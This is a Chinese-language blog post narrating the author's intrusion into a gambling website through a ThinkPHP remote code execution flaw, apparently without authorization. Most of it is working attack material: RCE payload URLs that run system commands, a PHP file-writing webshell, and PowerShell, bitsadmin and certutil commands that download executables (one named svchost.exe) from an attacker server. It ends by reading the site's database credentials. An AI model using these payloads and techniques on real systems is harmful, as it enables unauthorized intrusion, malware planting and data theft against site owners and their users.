美文网首页万网极研社
对某菠菜网站的一次渗透

对某菠菜网站的一次渗透

作者: 云破DOS | 来源:发表于2019-07-14 13:00 被阅读412次

无意间发现一个thinkphp的菠菜站,最近tp不是刚好有个漏洞吗?

然后就顺手测试了一下,但过程并不太顺利,不过最后还是拿下了,所以特发此文分享下思路。

0x00 一键getshell?

简单看了下,应该有不少人玩吧?

正好前几天写了个测试工具,先掏出来测试一发。

工具显示存在漏洞

一键getshell,看起来很顺利的样子,哈哈。

但是...我,发现事情并不简单。

菜刀连接的时候,返回500错误

我们用火狐的hackbar验证下,没毛病啊,那为什么菜刀连接不上呢?

作为菜逼的我不禁陷入了沉思..

0x01 开始分析

因为这个工具我自己写的,从上面getshell的图片中发现调用的是第三个exp,那么我们来分析下看看。

poc如下

/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir

我们在poc后面输入whoami看看权限。

/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

iis权限

但是可以执行部分命令,比如echo dir等等。

0x02 尝试突破拿shell

既然可以执行echo 那么我们可以来尝试写入个小马试试,如果成功的话,再利用小马上传大马,说干就干,苦活来了,我们得一行一行写入进去。

注意:代码中的<>符号,要用^^转义。比如<?php转义为^<^?php

<?php

header("content-Type: text/html; charset=gb2312");

if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v);

?>

<form method="POST">

保存文件名: <input type="text" name="file" size="60" value="<? echo str_replace('\\','/',__FILE__) ?>">

<br><br>

<textarea name="text" COLS="70" ROWS="18" ></textarea>

<br><br>

<input type="submit" name="submit" value="保存">

<form>

<?php

if(isset($_POST['file']))

{

$fp = @fopen($_POST['file'],'wb');

echo @fwrite($fp,$_POST['text']) ? '保存成功!' : '保存失败!';

@fclose($fp);

}

?>

逐行写入完成后,访问的时候发现并不能正常运行,这里忘记截图了。。

接下来尝试用以下方法下载文件到服务器上也失败了。

powershell下载

注意:内核5.2以下版本可能无效

powershell (new-object System.Net.WebClient).DownloadFile( 'http://192.168.174.145/ssss2.exe','C:\ssss2.exe')

bitsadmin下载

bitsadmin /transfer n http://baidu.com/PSTools.zip  C:\PSTools.zip

注意:不支持https、ftp协议,使用kali的simplehttpserver作服务器会报错

正当我打算放弃的时候,我想起来还有个下载的命令没用。

那就是certutil.exe

说干就干,把大马放到我们服务器上,开启HFS。

然后执行以下命令。

certutil.exe  -split -ur"lc"ache -f  http://ww.baidu.com/svchost.exe  svchost.exe

成功进入大马,不过别高兴太早

我再次,发现事情更不简单....

马可以操作文件上传改名等等,但是无法编辑文件,无法查看文件源码等等,点开显示一片空白。

既然这样,那么我们进数据库看看吧。

我们都知道tp的数据库配置文件在以下这个位置

/application/database.php

大马是无法打开了,那么我们可以用tp的命令执行漏洞尝试用type命令去读取这个文件。

/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=type c:\www\application\database.php

尝试type读取失败,然后又想到copy命令。

把database.php拷贝到web根目录下,改名为1.txt

/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=copy c:\www\application\database.php c:\www\public\1.txt

拷贝完成以后访问url/1.txt,发现里面是空的。

0x03 成功突破

经历了一系列的失败后,我冷静下来想了下,我们还可以用file_path去读取源码试试。

<?php

$file_path = 'c:/www/application/database.php';

if(file_exists($file_path)){

$fp = fopen($file_path,'r');

$str = fread($fp,filesize($file_path));

echo $str = str_replace('\r\n','<br />',$str);

}

?>

用大马上传这个文件到根目录下,然后访问,成功拿到数据库配置信息。

然后填写好配置信息,进入数据库。

此文写到这里已经夜深人静,看着桌子上吃了一半的泡面,最后喝了两口汤,关机,睡觉......

相关文章

  • 对某菠菜网站的一次渗透

    无意间发现一个thinkphp的菠菜站,最近tp不是刚好有个漏洞吗? 然后就顺手测试了一下,但过程并不太顺利,不过...

  • 对某菠菜网站的一次渗透测试

    无意间发现一个thinkphp的菠菜站,最近tp不是刚好有个漏洞吗? 然后就顺手测试了一下,但过程并不太顺利,不过...

  • 某菠菜网站渗透实战

    文章共计1769个词 预计阅读7分钟 来和我一起阅读吧 ≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈≈ 1前言 最...

  • 一次艰难的网站渗透

    信息收集 对某网站进行的一次渗透过程。存在php探针,phpinfo,phpmyadmin 弱口令登录失败。网站使...

  • 记一次对某网站的渗透测试

    今天正在开开心心的逛着B站,突然微信头像闪动,一看,原来是小黑让我帮忙给一个网站做安全检测,他说这是他叔叔的公司,...

  • 渗透某福利网站

    0*00前言 故事的起因: 然后 没有想到我为了一张SSC安全峰会的门票,义无反顾的走进上了一条不归路,不是一般的...

  • 对某代刷网站的渗透测试

    0x01 今天闲来无事,在网上冲浪看帖,看到有个人发了一个代刷网站链接,出于好奇就点进去看了下,一看,好家伙,业务...

  • 记一次渗透测试

    信息收集 在一次测试中对某网站进行渗透。 选择扫描目录,没有后台。但是爆出phpninfo的信息。。竟然是serv...

  • 针对某网站的渗透浅析

    一天下午,我正在得意洋洋的看着我的博客,发现某个IP正在对我的博客进行扫描,对此,你懂得。 对该IP进行扫描,发现...

  • 一次对某企业的渗透实战

    本文总结一下漫长的渗透测试过程,想尽了各种方法,终于找到了突破口。so没有绝对的安全,所谓的安全性其实都是相对的~...

网友评论

    本文标题:对某菠菜网站的一次渗透

    本文链接:https://www.haomeiwen.com/subject/ompbkctx.html